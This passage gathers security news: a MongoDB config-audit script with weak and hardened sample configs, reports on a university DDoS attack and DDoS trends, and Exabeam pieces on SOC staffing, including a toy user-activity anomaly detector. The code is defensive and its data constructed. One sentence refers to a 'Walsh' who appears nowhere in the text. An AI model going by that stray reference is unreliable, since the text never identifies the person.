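        exposed = addrs & {"0.0.0.0", "::"}
        if exposed:
            findings.append(f"net.bindIp includes {sorted(exposed)}: mongod listens on every interface")

    # security.keyFile (replica-set internal auth) implicitly enables authorization.
    if sec.get("authorization", "disabled") != "enabled" and "keyFile" not in sec:
        findings.append("security.authorization is not 'enabled': any client that can reach "
                        "the port can read and write every database")
    return findings


# Constructed configs for the demo (not Veeam's real files).
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 0.0.0.0        # reachable from the internet if the host is
security:
  authorization: disabled
"""

HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 127.0.0.1      # or the private address of the application subnet
security:
  authorization: enabled # clients must authenticate; create users first
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod_conf(conf) or ["no findings"])
```

Binding to a private address only moves the problem to the firewall, so the hardened fragment enables authorization as well; on a fresh deployment, create the administrative user before turning it on, or you lock yourself out.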
The website of Edinburgh University was still down at the time of writing after the institution suffered a major cyber-attack during its Freshers' Week.
A university spokesman told the Edinburgh Evening News that it has “rigid measures in place” to protect IT systems and data.
“Our defenses reacted quickly and no data has been compromised,” he added. “We will continue to work with our internet service provider, [national cybercrime investigators] and with other universities to prevent these network attacks in future.”
The main ed.ac.uk site was still down on Thursday morning, nearly 24 hours after the first reports of an attack went online. That would indicate a serious DDoS attack.
Jisc, the UK non-profit which runs the super-fast Janet network for research and educational institutions, released a statement claiming that a "number of universities" have been targeted this week and adding that the number of DDoS attacks on them "typically increases at this time of year, when students are enrolling at, or returning to university."
"While Jisc is responsible for protecting connections to the Janet Network for its members (colleges, universities and research centres), members are responsible for protecting their own cyberspace," it added. "However, Jisc also provides DDoS threat intelligence to its community and provides advice to members affected by cyber-attacks on how to deal with the problem and minimize the impact."
Ironically, Edinburgh University was praised by the government this year for carrying out cutting-edge cybersecurity research. It is one of 14 Academic Centres of Excellence in Cyber Security Research, backed by the £1.9bn National Cyber Security Strategy.
DDoS attacks grew by 40% year-on-year in the first six months of 2018, according to new figures from Corero Networks.
The security firm claimed that attacks are becoming shorter, with 82% lasting less than 10 minutes, and smaller, with 94% under 5Gbps. However, one in five victims is hit with another attack within 24 hours, the report revealed.
A separate quarterly threat report from Nexusguard found that, compared with the same period last year, the maximum attack size quadrupled to 359Gbps. Evaluating thousands of DDoS attacks worldwide, researchers gathered real-time attack data from botnet scanning, honeypots, ISPs and traffic moving between attackers and their targets. Data analysis led them to attribute the stark surge to IoT botnets and exploits by Satori, one of many variants of the Mirai malware.
“Due to the increase in IoT-related malware exploits and the rampant growth of large-scale DDoS attacks, research conclusions point to the continued use of IoT botnets. Cyber-attacks hit the 2018 FIFA World Cup, as well as cryptocurrency-related businesses, maximizing revenue loss,” Nexusguard wrote in a press release. Additionally, attacks on the Verge Network (XVG) resulted in a significant loss of 35 million XVG tokens.
“The biggest zero-day risks can stem from various types of home routers, which attackers can exploit to create expansive DDoS attacks against networks and mission-critical services, resulting in jumbo-sized attacks intended to cripple targets during peak revenue-generating hours,” said Juniman Kasman, chief technology officer for Nexusguard.
“Telcos and other communications service providers will need to take extra precautions to guard bandwidth against these super-sized attacks to ensure customer service and operations continue uninterrupted.”
Nexusguard analysts advise communications service providers (CSPs) and other potentially vulnerable operations to strengthen their preparedness so that they can maintain bandwidth under attack, especially where they lack full redundancy and failover in their infrastructure. CSPs and vulnerable organizations that enhance bandwidth protection will be better positioned to stay ahead of the surging attack sizes.
“In the quarter, increasingly large attacks (a YoY average-size increase of 543.17%) had a severe impact on Communication Service Providers (CSP)," the report said. "Serving as a link between attack sources and victim servers and infrastructures, CSPs bear the burden of the increasing size of traffic, irrespective of its source or destination. As such, Internet service is degraded.”
Whether it’s hiring new staff or up-leveling existing staff, companies have had to get creative to deal with the real challenges of the skills gap. To find out what security leaders are doing about people and training, Steve Moore, chief security strategist at Exabeam, talked with industry experts at Spotlight18 in Las Vegas about the creative ways they have answered the talent shortage.
One solution is "red team/blue team exercises and testing internally to make sure we are keeping staff on their toes,” said Ray Johnston, CISO at Inspire Brands. While internal efforts to keep current team members abreast of the newest threats are fruitful, it’s also important to build relationships outside the organization.
“We have established relationships with Army cyber defense and National Guard cyber defense units, and we’ve been able to pull from that resource pool,” Johnston said. Companies can tap into a wide pool of candidates that includes highly skilled people coming off of active duty.
“Also, we have been establishing relationships with local universities,” Johnston said. Partnering with existing business partners as well as local universities can also open doors of opportunity. Many existing partners are confronting the same staffing issues, however, so that route is not guaranteed, which is why part of the solution is growing people from inside through mentors and interns. Then there are organizations such as CyberPatriot that enable experts to mentor younger students and introduce them to the career opportunities available in cybersecurity.
Training is one area where many organizations fall behind, and Moore emphasized the importance of making sure the people in the SOC actually know what they are protecting: the business they are dealing with, its key risks and where the crown jewels are.
Given that IT as a whole and security in particular are challenged with constrained staffing and budgetary resources, “The single best advice is to make sure that your strategy for the SOC is aligned with risk,” said Andrew Wild, CISO at QTS. “Look at the limited resources you have, and make sure those align with the risks you think your organization is facing so that you can explain how they have been appropriately allocated.”
Another creative measure companies can take is to invest in new technologies that allow for security capabilities to be put into the hands of less-skilled people across the organization. “We have human resources departments that have started using Exabeam themselves. Even though they have never used a security technology, they can monitor user activity. This is really useful, especially if they know they are soon going to go through a reduction in force,” said Tony Kolish, EVP customer success at Exabeam.
“Monitoring user behavior then flags any anomalies so that other departments – such as HR and legal – can detect if something odd is happening. Then they can push that forward to the security team as something worth investigating.”
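To make concrete what “flagging anomalies” in user activity means at its simplest, here is an added example written for this article; it is not Exabeam’s analytics and the events in it are constructed, not real telemetry. It assumes a daily per-user count of files accessed, builds each user’s own baseline from the first week, and flags a later day only when the count is both far outside that baseline (a z-score threshold) and large in absolute terms. The second condition is the kind of guard that keeps a low-volume user with a flat history from tripping the alert, which is where much of the noise Walsh and the panelists complain about comes from.

```python
"""Toy per-user volume baseline: flag days whose activity count deviates sharply
from that user's own history. Added example; not Exabeam's method."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed events: (user, day_index, files_accessed). Not real data.
SAMPLE_EVENTS = [
    ("alice", 1, 11), ("alice", 2, 13), ("alice", 3, 10), ("alice", 4, 12),
    ("alice", 5, 14), ("alice", 6, 11), ("alice", 7, 12), ("alice", 8, 95),
    ("bob", 1, 5), ("bob", 2, 6), ("bob", 3, 4), ("bob", 4, 5),
    ("bob", 5, 6), ("bob", 6, 5), ("bob", 7, 4), ("bob", 8, 7),
]


def build_baselines(events, baseline_days=7):
    """Per-user (mean, population stdev) of daily counts over the baseline window.
    Users with fewer than three baseline days get no baseline and are never scored."""
    per_user = defaultdict(list)
    for user, day, count in events:
        if day <= baseline_days:
            per_user[user].append(count)
    return {u: (mean(c), pstdev(c)) for u, c in per_user.items() if len(c) >= 3}


def flag_anomalies(events, baseline_days=7, z_threshold=3.0, min_abs_delta=20):
    """Return (user, day, count, z) for post-baseline days that are both statistically
    and materially above the user's own history."""
    baselines = build_baselines(events, baseline_days)
    flagged = []
    for user, day, count in events:
        if day <= baseline_days or user not in baselines:
            continue
        mu, sigma = baselines[user]
        sigma = max(sigma, 1.0)  # floor: a perfectly flat history must not yield infinite z
        z = (count - mu) / sigma
        # Both tests must pass; the absolute floor suppresses noise from low-volume users.
        if z >= z_threshold and count - mu >= min_abs_delta:
            flagged.append((user, day, count, round(z, 1)))
    return flagged


if __name__ == "__main__":
    for hit in flag_anomalies(SAMPLE_EVENTS):
        print("review:", hit)
```

In the sample, alice’s jump from roughly a dozen files a day to 95 is flagged while bob’s day-8 count of 7 against a baseline of 5 is not, even though it is two standard deviations out. A real deployment would add peer-group comparison and more dimensions than volume, but the shape of the decision is the same.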
Having had the experience of building a SOC in the middle of a crisis in his former post, Steve Moore, chief security strategist at Exabeam, understands the need for security and security operations to be relevant. Leading a panel discussion on "Building a Modern SOC" at this year’s Spotlight18 conference in Las Vegas, Moore questioned why – given that so many organizations now have a SOC – attackers continue to be successful.
In order to answer that question, panelists first discussed what indicators of success or failure they look for in a SOC.
Panel participant Andrew Wild, CISO at QTS, went straight to metrics. “One key for me is looking at whether you have the right people and asking whether the metrics are good. Are the metrics reliable enough to evaluate your ongoing performance?” Looking at how they are measuring and how they can improve are indicators that offer value when thinking about SOC transformation.
While metrics do have value, Ray Johnston, CISO at Inspire Brands, said one key indicator for him is looking at whether they have the right people. “How are you keeping them current? Do they have the right skill sets? We underinvest in people, and let them sit and stagnate. At the end of the day, it’s people, process and technology. People can screw up that process.
“Most often, conversations about the SOC include the issue of signal-to-noise ratio. SOCs lack contextualization, the time they need to build the story and the right resources to make decisions in a rapid fashion. We have to get better at moving the advanced threat actors into spaces where we can pick them up quicker.”
In addition to the people, there are also technical blockers, like patching, which is always an issue. Patching is viewed by some as the easiest thing to do, yet panelists agreed that many organizations do it quite poorly, with few understanding whether patching is even managed and maintained correctly or whether the patches are actually working.
“Patching is important, but what are you patching?” said Wild. “You can’t patch everything. It’s just not possible. Are they patching those software components with known exploits that are commonly used? We need to be bringing a risk-based approach into the SOC to focus on the known threats that are most likely to cause issues.”
A risk-based approach includes physical security but also knowing what and where the crown jewels are. “It’s not just in the security space but in the space around security. If you are not aware of where the consumer or business trends are taking the business, you will fail,” Wild said.